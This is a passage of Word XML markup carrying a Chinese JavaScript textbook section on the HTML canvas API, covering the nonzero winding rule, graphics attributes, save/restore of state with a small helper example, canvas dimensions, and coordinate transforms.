    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要检测一个点</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>是否在路径的内部，使用</w:t>
      </w:r>
      <w:r>
        <w:t>非零绕数原则：想象一条从点</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>出发沿着任意方向无限延伸（或者一直延伸到路径所在的区域外某点）的射线。现在从</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>开始初始化一个计数器，然后对所有穿过这条射线的路径进行枚举。每当一条路径顺时针方向穿过</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>射线的时候，计数器就加</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>；反之，就减</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>。最后，枚举完所有的路径之后，如果计数器的值不是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，那么就认为</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>是在路径内。反之，如果计数器的值是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，则认为</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>在路径外。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="532" w:name="21_4_2_Tu_Xing_Shu_Xing_"/>
      <w:r>
        <w:t>21.4.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　图形属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="532"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>21-4</w:t>
      </w:r>
      <w:r>
        <w:t>设置了画布的上下文对象的</w:t>
      </w:r>
      <w:r>
        <w:t>fillStyle</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>strokeStyle</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>lineWidth</w:t>
      </w:r>
      <w:r>
        <w:t>属性。这些属性都是图形属性，分别指定了</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>fill()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>stroke()</w:t>
      </w:r>
      <w:r>
        <w:t>时候要采用的颜色以及调用</w:t>
      </w:r>
      <w:r>
        <w:t>stroke()</w:t>
      </w:r>
      <w:r>
        <w:t>方法绘制线段时的线段宽度。要注意的是，这些参数不是传递给</w:t>
      </w:r>
      <w:r>
        <w:t>fill()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>stroke()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的，而是作为画布的通用图形状态。如果定义一个绘制形状的方法，但是该方法没有设置这些属性，那么调用者可以在调用该方法前，设置</w:t>
      </w:r>
      <w:r>
        <w:t>strokeStyle</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>fillStyle</w:t>
      </w:r>
      <w:r>
        <w:t>属性。这种将从将图形状态和绘制指令分离的细想是画布</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>中很重要的概念，同时也和通过在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中应用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式来实现表现和内容分离是类似的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>画布</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>中在</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRender</w:t>
      </w:r>
      <w:r>
        <w:t>ingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象上定义了</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>个图形属性。表</w:t>
      </w:r>
      <w:r>
        <w:t>21-1</w:t>
      </w:r>
      <w:r>
        <w:t>中列出了这些属性，并对它们一一进行了说明。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251726848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4127739" cy="1777041"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="67" name="00067.jpeg" descr="000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7.jpeg" descr="00067.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId70"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4127739" cy="1777041"/>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27872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4106173" cy="1798607"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="68" name="00068.jpeg" descr="000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8.jpeg" descr="00068.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId71"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4106173" cy="1798607"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>因为画布</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在上下文对象上定义图形属性，所以你也许试图多次调用</w:t>
      </w:r>
      <w:r>
        <w:t>getContext()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来获取多个上下文对象。如果可以这样，能够在每个上下文中定义不同的属性：在每个上下文中，就好像拥有了不同的画笔，将会绘制出不同的颜色，或者不同宽度的线段。遗憾的是，在画布中不能这样使用。每个＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素只有一个上下文对象，因此每次调用</w:t>
      </w:r>
      <w:r>
        <w:t>getContext()</w:t>
      </w:r>
      <w:r>
        <w:t>方法都会返回相同的</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管画布</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>只允许一次设置单一的图形属性集合，但是它允许保存当前图形状态，这样就</w:t>
      </w:r>
      <w:r>
        <w:t>可以在多个状态之间切换，之后也可以很方便地恢复。调用</w:t>
      </w:r>
      <w:r>
        <w:t>save()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会将当前图形状态压入用于已保存状态的栈上。调用</w:t>
      </w:r>
      <w:r>
        <w:t>restore()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会从栈中弹出并恢复最近一次保存的状态。表</w:t>
      </w:r>
      <w:r>
        <w:t>21-1</w:t>
      </w:r>
      <w:r>
        <w:t>中列出的所有属性都是已保存状态的一部分，包括当前的转换信息以及裁剪区域等信息（两者都会在后面做介绍）都是已保存状态的一部分。但是，很重要的一点是：当前定义的路径以及不属于图形状态的当前点都不能保存和恢复。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果需要比简单的图形状态栈允许的方式更加灵活，可以像例</w:t>
      </w:r>
      <w:r>
        <w:t>21-5</w:t>
      </w:r>
      <w:r>
        <w:t>那样定义一个工具方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>21-5</w:t>
      </w:r>
      <w:r>
        <w:t>：图形状态管理工具</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>恢复最后一次保存的图形状态，但是让该状态从栈中弹出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>CanvasRenderingContext2D.prototype.revert=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.restore();//</w:t>
      </w:r>
      <w:r>
        <w:t>恢复最后一次保存的图形状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.save();//</w:t>
      </w:r>
      <w:r>
        <w:t>再次保存它以便后续使用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this;//</w:t>
      </w:r>
      <w:r>
        <w:t>允许方法链</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性来设置图形属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>或者，如果没有提供参数，就以对象的方式返回当前属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>要注意的是，它不处理变换和裁剪区域</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>CanvasRenderingContext2D.protot</w:t>
      </w:r>
      <w:r>
        <w:t>ype.attrs=function(o){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(o){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var a in o)//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的每个属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this[a]=o[a];//</w:t>
      </w:r>
      <w:r>
        <w:t>将它设置成图形属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this;//</w:t>
      </w:r>
      <w:r>
        <w:t>启用方法链</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else return{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>fillStyle:this.fillStyle,font:this.font,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>globalAlpha:this.globalAlpha,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>globalCompositeOperation:this.globalCompositeOperation,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>lineCap:th</w:t>
      </w:r>
      <w:r>
        <w:t>is.lineCap,lineJoin:this.lineJoin,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>lineWidth:this.lineWidth,miterLimit:this.miterLimit,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>textAlign:this.textAlign,textBaseline:this.textBaseline,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>shadowBlur:this.shadowBlur,shadowColor:this.shadowColor,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>shadowOffsetX:this.shadowOffsetX,shadowOffsetY:this.sh</w:t>
      </w:r>
      <w:r>
        <w:t>adowOffsetY,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>strokeStyle:this.strokeStyle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533" w:name="21_4_3_Hua_Bu_De_Chi_Cun_He_Zuo_Biao_"/>
      <w:r>
        <w:t>21.4.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　画布的尺寸和坐标</w:t>
      </w:r>
      <w:bookmarkEnd w:id="533"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>属性和对应的画布对象的宽度以及高度属性决定了画布的尺寸。画布的默认坐标系是以画布最左上角为坐标原点</w:t>
      </w:r>
      <w:r>
        <w:t>(0,0)</w:t>
      </w:r>
      <w:r>
        <w:t>。越往右</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>轴的数值越大，越往下</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>轴的数值越大。画布上的点可以使用浮点数来指定坐标，但是它们不会</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>自动转换成整型值</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>画布采用反锯齿的方式来模拟部分填充的像素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>画布的尺寸是不能随意更改的，除非完全重置画布。重置画布的</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>属性或者</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>属性（哪怕重置的时候属性值不变），都会清空整个画布，擦除当前的路径并且会重置所有的图形属性（包括当前的变换和裁剪区域）为初始状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管画布尺寸是很重要的概念，但是设置了画布尺寸的大小，未必能够保证画布在屏幕上展现的大小或者组成画布绘图图面的所有像素点的个数一致。画布尺寸（以及默认的坐标系统）都是以</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素为单位的。</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素和常规的像素是一样的。然而，在高分辨率显示环境下，要求将多设备像素映射到单个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素上。这也就</w:t>
      </w:r>
      <w:r>
        <w:t>意味着，画布上一个长方形的像素在高分辨率显示环境下可能要比它实际的大小要大。当使用画布的像素操作特性的时候（参见</w:t>
      </w:r>
      <w:r>
        <w:t>21.4.14</w:t>
      </w:r>
      <w:r>
        <w:t>节），尤其要深知这一点。但是，虚拟</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素和实际的硬件像素之间的区别对书写的画布代码没有任何影响。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>默认情况下，＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞会按照它设置的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>属性值来显示画布大小（以</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素为单位）。但是，和其他</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素一样，＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素还可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>样式属性来设置它的屏幕显示大小。如果指定画布的屏幕显示大小和它的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>实际尺寸</w:t>
      </w:r>
      <w:r>
        <w:t>不同，那么画布上所有的像素都会自动缩放以适合通过</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定的屏幕显示尺寸。画布的屏幕显示大小不会影响画布位图的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素或者硬件像素的个数，它的缩放是采用图片缩放方式处理的。如果屏幕显示尺寸要远远大于画布的实际尺寸，那么会导致像素化图形。这个问题需要图形设计师去考虑，和画布编程无关。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="534" w:name="21_4_4_Zuo_Biao_Xi_Bian_Huan_"/>
      <w:r>
        <w:t>21.4.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　坐标系变换</w:t>
      </w:r>
      <w:bookmarkEnd w:id="534"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>此前提到过，默认坐标系是以画布最左上角为坐标原点</w:t>
      </w:r>
      <w:r>
        <w:t>(0,0)</w:t>
      </w:r>
      <w:r>
        <w:t>。越往右</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>轴的数值越大，越往下</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>轴的数值越大。在默认坐标系中，每一个点的坐标都是直接映射到一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素上（</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素之后再映射到一个或者</w:t>
      </w:r>
      <w:r>
        <w:t>多个设备像素）。画布中一些特定的操作和属性的设置（诸如抽取原始像素值以及设置阴影偏移量）都使用默认坐标系。然而，除了默认的坐标系之外，每个画布还有一个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>当前变换矩阵</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，作为图形状态的一部分。该矩阵定义了画布的当前坐标系。当指定了一个点的坐标后，画布的大部分操作都会将该点映射到当前的坐标系中，而不是默认的坐标系。当前变换矩阵是用来将指定的坐标转换成为默认坐标系中的等价坐标。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管通过调用</w:t>
      </w:r>
      <w:r>
        <w:t>setTransform()</w:t>
      </w:r>
      <w:r>
        <w:t>方法能够直接设置画布的变换矩阵，但是通过转换、旋转和缩放操作更容易实现坐标系变换。图</w:t>
      </w:r>
      <w:r>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>-7</w:t>
      </w:r>
      <w:r>
        <w:t>展示</w:t>
      </w:r>
      <w:r>
        <w:t>了这些操作以及操作之后画布坐标系的样子。实现该图的程序其实只是将同一组坐标轴在一行中绘制了</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>遍。这</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>次绘制中唯一不同的只是坐标系不同而已。这里要注意的是，坐标的变换还影响了文本和线段的绘制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>translate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法只是简单地将坐标原点进行上、下、左、右移动。调用</w:t>
      </w:r>
      <w:r>
        <w:t>rotate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会将坐标轴根据指定角度（画布</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>总是以弧度制来表示角度。要将角度制转换成弧度制，可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>Math.PI</w:t>
      </w:r>
      <w:r>
        <w:t>来对</w:t>
      </w:r>
      <w:r>
        <w:t>180</w:t>
      </w:r>
      <w:r>
        <w:t>进行乘除来实现）进行顺时针旋转。调用</w:t>
      </w:r>
      <w:r>
        <w:t>scale()</w:t>
      </w:r>
      <w:r>
        <w:t>方法实现对</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>轴或者</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>轴上的距离进行延长和缩短。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>sca</w:t>
      </w:r>
      <w:r>
        <w:t>le()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的时候传递负值会实现以坐标原点做参照点将坐标轴进行翻转，就好像是镜子中的镜像。图</w:t>
      </w:r>
      <w:r>
        <w:t>21-7</w:t>
      </w:r>
      <w:r>
        <w:t>中最左下角的图就是这样实现的：</w:t>
      </w:r>
      <w:r>
        <w:t>translate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法用来将坐标原点移动到画布最左下角，然后</w:t>
      </w:r>
      <w:r>
        <w:t>scale()</w:t>
      </w:r>
      <w:r>
        <w:t>方法用于实现将</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>轴进行翻转，这样就变成了越往上</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
